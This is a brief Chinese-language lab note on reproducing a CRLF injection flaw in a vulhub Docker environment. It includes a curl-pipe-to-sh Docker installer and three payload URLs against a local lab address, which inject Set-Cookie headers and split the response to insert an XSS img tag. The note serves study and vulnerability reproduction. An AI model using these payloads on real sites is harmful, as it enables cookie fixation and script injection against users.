复现环境
复现过程
curl -sSL https://get.daocloud.io/docker | sh
yum -y install epel-release yum -y install python-pip
对pip进行升级
pip install --ignore-installed requests
配置下docker镜像加速,这里使用的是阿里云的镜像加速,网站有配置方法,这里不进行赘述
然后从git上下载以下别人打包好的漏洞复现的docker项目
https://github.com/vulhub/vulhub
对于CRLF漏洞的介绍先看这篇文章:https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html
http://192.168.61.143:8080/%0A%0DSet-Cookie:%20a=1%0A%0DSet-cookie:JSPSESSID%3Dwooyun
http://192.168.61.143:8080/%0D%0ASet-Cookie:%20a=1%0d%0a%0d%0a<img src=1 οnerrοr=alert(/xss/)>
http://192.168.61.143:8080/%0D%0ASet-Cookie:%20a=1%0d%0a%0d%0a%3Cimg%20src=1%3E